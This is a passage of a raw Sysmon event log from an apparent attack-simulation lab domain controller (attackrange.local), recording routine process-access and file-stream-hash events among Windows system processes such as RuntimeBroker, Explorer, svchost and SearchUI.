base.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000010995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=D9DEC0CB99A429DE9DFF76407267FADC,SHA256=4D7D2D8CBBCD944E297D27E68794B1FB3E72184EF8F84A1146EFCF4AC1313704,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000010992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.220{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD751191CABDD3407CF5B0DE78A2D58,SHA256=3E7D6295A9B80EF67E3CC1EF9EADF450C477768190B178E474653AB7FE1326BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.907{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.907{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.907{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 